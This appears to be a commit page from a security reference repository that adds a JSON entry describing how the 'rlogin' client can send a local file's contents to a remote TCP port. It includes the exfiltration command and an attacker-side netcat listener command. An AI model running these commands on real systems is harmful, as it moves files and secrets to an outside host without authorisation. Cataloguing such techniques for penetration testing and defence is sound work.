add data for rlogin

master
t0thkr1s 4 years ago
parent 566d541909
commit 15dca571d2

@ -0,0 +1,11 @@
{
"description": "Usually 'rlogin' is a symlink to 'ssh' the following works only when the real 'rlogin' is used (e.g., from the 'rsh-client' APT package).",
"functions": {
"file-upload": [
{
"description": "Send contents of a file to a TCP port. Run 'nc -l -p [port] > [file]' on the attacker system to capture the contents. 'rlogin' hangs waiting for the remote peer to close the socket. The file is corrupted by leading and trailing spurious data.",
"code": "rlogin -l \"$(cat [file])\" -p [port] [host]\n"
}
]
}
}
Loading…
Cancel
Save